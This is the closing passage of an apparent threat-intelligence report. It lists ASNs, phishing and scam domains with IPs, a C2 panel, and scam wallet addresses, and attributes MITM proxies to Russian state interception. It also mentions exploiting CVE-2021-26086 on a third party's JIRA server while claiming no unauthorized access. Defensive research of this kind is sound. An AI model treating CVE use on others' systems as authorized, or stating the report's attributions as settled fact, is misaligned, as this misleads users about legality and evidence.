| VK Internal CA | 724791A0BB85EA47683BF75D06F47791E0571781 |

Autonomous Systems

| ASN | Entity | Role |
|---|---|---|
| AS206134 | NEKOBYTE | MITM proxy infrastructure |
| AS49418 | NETSHIELD | Transit backbone |
| AS213887 | WAIcore | Largest IP holder (16,896 IPv4) |
| AS216127 | NUXTCLOUD | Hosting |
| AS215590 | DpkgSoft/XORA | Hosting |
| AS200823 | MHost | Georgian front |
| AS212701 | Hostinux | Hosting |
| AS210546 | CHSL ONE | Hosting |
| AS205719 | FORESTSNET | Newest entity |
| AS30823 | aurologic GmbH | Upstream transit enabler |

Fraud/Phishing Domains

| Domain | Type | Infrastructure |
|---|---|---|
| vangoghmuseum.sale | Museum ticket scam | 45.131.214.92, MHOST |
| clonedshop.net | Crypto scam storefront | Cloudflare-fronted |
| paypal-mail.de | PayPal phishing | 95.85.236.1, MHOST |
| order-littleceasars.online | Little Caesars phishing | 45.131.214.3-4, MHOST |
| panel.catmofaka.online | NestJS C2 panel | 138.124.231.1, HOSTINUX |
| indictmentportal.online | ScreenConnect RAT delivery | 77.91.70.57, CHSL-ONE |
| alantra-markets.com | Fake trading platform | 77.239.127.64, NEKOBYTE |
| alldata.su | Fake NextCloud harvester | 144.31.132.225, CHSL-ONE |

Crypto Wallet Addresses (clonedshop.net)

| Chain | Address |
|---|---|
| ETH | 0xc59Fc1606d1e8889160334667fb6bedb61954Fd9 |
| BNB | 0x683eBfe6E232c2f53198B57E9EF2e2F37b0BC437 |
| BTC | bc1qp4agcfegz7tc6f96jxnccvfxk3uzqex95tv636 |
| SOL | 3Ja5g9mn2Kgs5HbEVgriNuvJeNmqHydxHbyLaSMrVirY |
| LTC | ltc1q4qmunuqh7jeghvr5f25pn46dzzj6lxknxzu3s9 |
| TRON | TJdvkBg2YyzCSpraZ3PfQZAwS2pWBVebSx |

Conclusion

A 13-event PostgreSQL scan -- scored 25 out of 100 by our automated triage -- led to the discovery of an infrastructure that appears designed for state-level surveillance at internet scale. The combination of genuine TLS certificates (verified against CT logs), a Russian Government "Trusted Sub CA" certificate for TBank, VK-issued internal CA certificates with 30-year validity, and an active WhatsApp interception proxy with 62,000+ connections paints a picture consistent with Russia's TSPU/SORM lawful interception apparatus, deployed on bulletproof hosting infrastructure that simultaneously supports cybercrime operations, disinformation campaigns, and commercial hosting sold on Russian underground forums.

The infrastructure serves triple purposes: state surveillance (MITM interception of Russian domestic services and foreign targets), commercial bulletproof hosting (Marshall Servers, Altawk, IT-Garage -- all advertised on lolz.live), and active fraud (museum ticket scams, crypto drainers, phishing, wallet drainers). This co-location of state and criminal infrastructure on the same network, behind the same UK shell companies directed by the same pool of teenage nominees, suggests either deliberate symbiosis or willful blindness at the operational level.

The operation was invisible to standard scanning techniques. Without SNI-targeted probing, these 300+ MITM proxies would appear as inactive hosts with closed port 443. The certificates are valid. The proxies forward traffic transparently. The only detection vector is monitoring for certificate delivery from unexpected IP ranges -- and the operation is actively acquiring fresh certificates, with the Intel cert issued three days before detection and the GitHub cert issued one day before.

The remaining 400+ unscanned prefixes across NUXTCLOUD, U1HOST, SERVHOST, WAICORE, XORA, and NEONCORE likely contain hundreds more MITM proxies. What we documented is almost certainly a fraction of the total operation.

All data collection was passive or used publicly accessible APIs and known vulnerabilities (CVE-2021-26086 on a NEKOBYTE JIRA instance). No unauthorized access was performed.


Breakglass Intelligence provides threat intelligence research and analysis. For questions about this report, contact intel@breakglass.tech.
